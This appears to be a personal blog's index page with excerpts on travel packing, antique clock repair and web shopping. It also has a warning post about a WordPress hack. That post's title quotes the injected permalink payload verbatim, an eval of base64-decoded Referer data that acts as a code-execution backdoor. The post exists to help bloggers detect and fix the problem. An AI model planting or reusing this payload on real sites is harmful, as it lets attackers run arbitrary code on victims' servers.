Packing up…

I’m organizing my electronics, clothing, and sundries for our trip to Nova Scotia. The plane leaves at around 7:30 PM tomorrow, and we arrive in Halifax at about 6:30 am or some similar ungodly hour- I’m only vaguely aware of the actual itinerary.

The actual details of the travel are not that interesting to me at the moment. The important stuff, of course, is what to take and what to do when we get there.

(more…)

Continue ReadingPacking up…

WordPress SQL injection hack: watch for=> %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

If you are running a WordPress based blog like I am and suddenly notice your post URLs have something “extra” appended (see the subject line), your blog has been hacked.

You can read more about it here (thanks, UCLABoyz, thanks schang!), where you will also find guidance regarding cleaning the problem up. Unfortunately, it appears that the hack works on all versions of WordPress up to and including the most recent.

I have BadBehavior installed on my blog, and so it was rejecting the URLs with this addition which I *think* would be thwarting the hackers involved: they hadn’t been able to create an administrative user. Unfortunately, it also meant none of my blog posts were working properly until I noticed the problem and corrected it.

Hopefully WordPress will issue a fix for this soon- in the mean time, keep an eye on your URLs, WordPress bloggers!

UPDATE: Another link to a lengthy thread regarding this hack on the WordPress.org site. What is interesting here is the apparent vector: a weakness in the WordPress code, apparently up to and including the most recent release, that permits an ordinary subscriber (i.e.: not an administrative user) to run some administrator features e.g.: changing the permalinks.

UPDATE #2: it appears that updating to the most recent version of WordPress (2.8.4) removes the “double slash” vector for running some admin commands (notably permalink.php). This fix was apparently added somewhere between WordPress version 2.8 and 2.8.4.

I’ve included some extracts from my server logs and further thoughts below…

  

(more…)

Continue ReadingWordPress SQL injection hack: watch for=> %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Fixer clock #1 tear down and reassembly

I picked what I thought would be the least complicated clock to work on first. This circa 1913 Gilbert “gilt No. 115” clock has a simple time-only mechanism. Unfortunately for me, it is a small and “cheap” (mass produced) clock, meaning the thick brass and large pivots found in some of the other “fancier” clocks are replaced with pot metal and tiny parts that aren’t really made for easy repair.

What follows is sort of a journal of my experiences thus far in working on this clock. For anyone who doesn’t have at least a passing interest in clocks, it is probably advisable to skip reading the rest of this post. The short story: I successfully disassembled, cleaned, repaired the main problem, and re-assembled the clock. It still doesn’t work properly, and I’ve found at least one additional problem that I will have to fix later.

(more…)

Continue ReadingFixer clock #1 tear down and reassembly

Famous

Years from now, someone will ask "Who is Kelly Adams? Was he ever famous?" And the answer will be "No, of course not. But his brother Ron was once on…

Continue ReadingFamous

Web shopping

A year ago, I was an occasional “web shopper”. Most of what I bought was purchased through my favorite “computer stuff” store, NCIX. But that isn’t “really” web shopping: I’d order stuff through their website, sure, but I’d go pick it up at their nearest location here in Langley. Real webshopping is when the thing you ordered arrives at the door courtesy the friendly post/UPS/FedEx/Purolator person.

Fast forward to today…

(more…)

Continue ReadingWeb shopping

Clear evidence of what is important…

A young man in the United States stands accused of a horrible crime. Federal agents recently raided his home, and he faces as much as ten years in a federal prison. According to his accusers, his wanton illegal acts are many and varied, and all necessary steps should be taken to insure he pays for his crimes.

(more…)

Continue ReadingClear evidence of what is important…

End of content

No more pages to load